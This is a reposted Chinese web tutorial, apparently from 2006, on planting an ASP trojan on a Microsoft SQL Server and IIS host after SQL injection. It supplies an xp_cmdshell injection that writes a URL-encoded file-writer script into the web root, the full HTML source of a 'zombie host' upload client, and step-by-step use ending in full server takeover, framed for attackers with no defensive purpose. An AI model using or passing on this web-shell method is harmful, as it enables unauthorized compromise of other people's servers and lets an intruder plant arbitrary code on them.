分享
 
 
 

SQL注入与ASP木马上传

王朝mssql·作者佚名  2006-12-17
窄屏简体版  字體: |||超大  

SQL注入与ASP木马上传

SQL注入与ASP木马上传 SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。

1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。

文件内容:

<%

Set objFSO = Server.createObject('Scripting.FileSystemObject')

Set objCountFile=objFSO.createTextFile(request('mypath'),True)

objCountFile.Write request('mydata')

objCountFile.Close

%>

这个文件可以写成一行 <%Set objFSO = Server.createObject('Scripting.FileSystemObject'):Set objCountFile=objFSO.createTextFile(request('mypath'),True):objCountFile.Write request('mydata'):objCountFile.Close%>

将特殊字符进行编码 就可以得到

%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E

注入(这里假定web目录是C:\Inetpub\wwwroot\):

exec master..xp_cmdshell 'echo '%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E' > C:\Inetpub\wwwroot\ftp.asp';

这样 在服务器的web 目录下 将生成一个 ftp.asp文件

该文件的代码为

<%

Set objFSO = Server.createObject('Scripting.FileSystemObject')

Set objCountFile=objFSO.createTextFile(request('mypath'),True)

objCountFile.Write request('mydata')

objCountFile.Close

%>

你可以看到,上面代码中预留了两个接口 mypath 和 mydata

mypath是下次提交的时候 文件的生成路径

mydata是文件的内容

在本地编写一个客户端文件 例:RohuClient.htm 代码如下

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>

<html>

<head>

<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>

<title>肉鸡文件生成器--客户端 制作:绝对零度 QQ:12216796</title>

<style type='text/css'>

<!--

TD {

FONT-SIZE: 9pt; LINE-HEIGHT: 150%

}

BODY {

FONT-SIZE: 12px;

FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋体;

SCROLLBAR-FACE-COLOR: #eeeeee;

SCROLLBAR-HIGHLIGHT-COLOR: #ffffff;

SCROLLBAR-SHADOW-COLOR: #dee3e7;

SCROLLBAR-3DLIGHT-COLOR: #d1d7dc;

SCROLLBAR-ARROW-COLOR: #006699;

SCROLLBAR-TRACK-COLOR: #ededed;

SCROLLBAR-DARKSHADOW-COLOR: #98aab1

}

A:link {

FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none

}

A:visited {

FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none

}

A:hover {

COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline

}

input,select,TEXTAREA {

font-family: 'tahoma', 'arial', 'helvetica', 'sans-serif', '宋体';

background-color: #f9f9f9;

font-size: 9pt ;

border: 1px #d2d2d2 dobble;

line-height:120%;

}

-->

</style>

</head>

<script language='javascript' type='text/javascript'>

function chk(theform)

{

if(theform.ftpUrl.value=='')

{

alert('请输入递交的地址!');

theform.ftpUrl.focus();

return false;

}

if(theform.MyPath.value=='')

{

alert('请输入生成文件的位置!');

theform.MyPath.focus();

return false;

}

if(theform.MyData.value=='')

{

alert('请输入生成文件的内容!');

theform.MyData.focus();

return false;

}

theform.action=theform.ftpUrl.value;

}

</script>

<body>

<form name='RohuForm' method='post' action='' onSubmit='return chk(this)' target='_blank'>

<table width='673' border='0' align='center' cellpadding='0' cellspacing='0'>

<tr>

<td width='11%'>目标位置:</td>

<td width='79%'><input name='ftpUrl' type='text' id='ftpUrl' size='50'>

例:http://127.0.0.1/FTP.ASP<;/td>

</tr>

<tr>

<td>生成文件:</td>

<td><input name='MyPath' type='text' id='MyPath'>

将在服务器上,生成的文件路径。例:

C:\Inetpub\wwwroot\Server.asp </td>

</tr>

<tr>

<td valign='top'>文件代码:</td>

<td><textarea name='MyData' cols='100' rows='10' id='textarea'></textarea></td>

</tr>

<tr>

<td> </td>

<td><input type='submit' name='Submit' value='提交'></td>

</tr>

</table>

<br>

</form>

<table width='100%' border='0' cellspacing='0' cellpadding='0'>

<tr>

<td align='center'>版权所有:绝对零度(<a href='http://www.rohu.com';>虎盟</a>)</td>

</tr>

</table>

</body>

</html>

在目标位置栏填上刚刚生成的ftp.asp文件的url地址

如 http://127.0.0.1/ftp.asp (这里假设服务器的ip是 127.0.0.1)

在生成文件栏 输入将在服务器上生成的文件名 比如:C:\Inetpub\wwwroot\Server.asp

在文件内容里 ,随意的粘贴一个asp代码

点递交,当http://127.0.0.1/ftp.asp 文件执行完毕 基本上服务器上的asp木马就生成了。

浏览 http://127.0.0.1/Server.ASP 呵呵 服务器就是你的了

Hoky: 这篇文章前段时间不知道在那个地方看过.转贴的时候就没有写作者是谁.我也不记得了.

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有